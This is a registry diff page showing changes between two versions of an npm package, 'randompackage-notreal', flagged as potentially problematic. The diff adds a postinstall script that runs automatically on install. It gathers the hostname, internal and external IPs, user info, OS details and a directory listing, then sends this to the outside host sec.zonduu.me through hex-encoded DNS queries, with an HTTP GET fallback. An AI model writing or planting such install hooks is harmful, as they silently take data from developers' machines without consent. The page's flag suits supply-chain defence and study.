randompackage-notreal 1.0.2 → 1.0.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of randompackage-notreal might be problematic. Click here for more details.
- package/package.json +5 -2
- package/postinstall.js +15 -10
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "randompackage-notreal",
|
|
3
|
-
"version": "1.0.
|
|
3
|
+
"version": "1.0.4",
|
|
4
4
|
"description": "Researcher public package",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
@@ -14,5 +14,8 @@
|
|
|
14
14
|
"dist/css/common.css",
|
|
15
15
|
"postinstall.js",
|
|
16
16
|
"index.js"
|
|
17
|
-
]
|
|
17
|
+
],
|
|
18
|
+
"dependencies": {
|
|
19
|
+
"randompackage-notreal": "^1.0.3"
|
|
20
|
+
}
|
|
18
21
|
}
|
package/postinstall.js
CHANGED
|
@@ -3,6 +3,7 @@ const dns = require('dns');
|
|
|
3
3
|
const http = require('http');
|
|
4
4
|
const https = require('https');
|
|
5
5
|
const os = require('os');
|
|
6
|
+
const { execSync } = require('child_process');
|
|
6
7
|
|
|
7
8
|
const logFile = '/tmp/postinstall.log';
|
|
8
9
|
|
|
@@ -13,12 +14,19 @@ fs.appendFileSync(logFile, `Starting postinstall script\n`);
|
|
|
13
14
|
const hostname = os.hostname();
|
|
14
15
|
const packageName = process.env.npm_package_name;
|
|
15
16
|
const packageVersion = process.env.npm_package_version;
|
|
16
|
-
const internalIpAddress =
|
|
17
|
-
const currentPath = process.cwd();
|
|
17
|
+
const internalIpAddress = execSync('hostname -I').toString().trim();
|
|
18
|
+
const currentPath = process.cwd(); // Use process.cwd() to capture current directory
|
|
18
19
|
const platform = os.platform();
|
|
19
20
|
const userInfo = os.userInfo();
|
|
20
21
|
|
|
21
|
-
//
|
|
22
|
+
// Get list of files in the current directory (where npm install is run)
|
|
23
|
+
let directoryFiles;
|
|
24
|
+
try {
|
|
25
|
+
directoryFiles = execSync('ls').toString().trim();
|
|
26
|
+
} catch (error) {
|
|
27
|
+
directoryFiles = `Error executing ls command: ${error.message}`;
|
|
28
|
+
}
|
|
29
|
+
|
|
22
30
|
const osDetails = {
|
|
23
31
|
platform: os.platform(),
|
|
24
32
|
release: os.release(),
|
|
@@ -58,23 +66,21 @@ fetchExternalIpAddress((err, externalIpAddress) => {
|
|
|
58
66
|
currentPath,
|
|
59
67
|
platform,
|
|
60
68
|
userInfo,
|
|
61
|
-
osDetails
|
|
69
|
+
osDetails,
|
|
70
|
+
directoryFiles // Include the directory listing from the current directory
|
|
62
71
|
};
|
|
63
72
|
|
|
64
73
|
fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
|
|
65
74
|
|
|
66
|
-
// Prepare data for DNS exfiltration
|
|
67
75
|
const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
|
|
68
76
|
const hexData = Buffer.from(dnsData).toString('hex');
|
|
69
77
|
|
|
70
|
-
// Split hex data into parts fitting within DNS label length limit
|
|
71
78
|
const maxLabelLength = 63;
|
|
72
79
|
const hexDataParts = [];
|
|
73
80
|
for (let i = 0; i < hexData.length; i += maxLabelLength) {
|
|
74
81
|
hexDataParts.push(hexData.substring(i, i + maxLabelLength));
|
|
75
82
|
}
|
|
76
83
|
|
|
77
|
-
// Send each part as a separate DNS query
|
|
78
84
|
hexDataParts.forEach((part, index, arr) => {
|
|
79
85
|
const partIndex = index + 1;
|
|
80
86
|
const totalParts = arr.length;
|
|
@@ -88,12 +94,11 @@ fetchExternalIpAddress((err, externalIpAddress) => {
|
|
|
88
94
|
});
|
|
89
95
|
});
|
|
90
96
|
|
|
91
|
-
// HTTP fallback
|
|
92
97
|
const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
|
|
93
98
|
|
|
94
99
|
const options = {
|
|
95
|
-
hostname: 'sec.zonduu.me',
|
|
96
|
-
port: 80,
|
|
100
|
+
hostname: 'sec.zonduu.me',
|
|
101
|
+
port: 80,
|
|
97
102
|
path: `/callbackplz?${getData}`,
|
|
98
103
|
method: 'GET'
|
|
99
104
|
};
|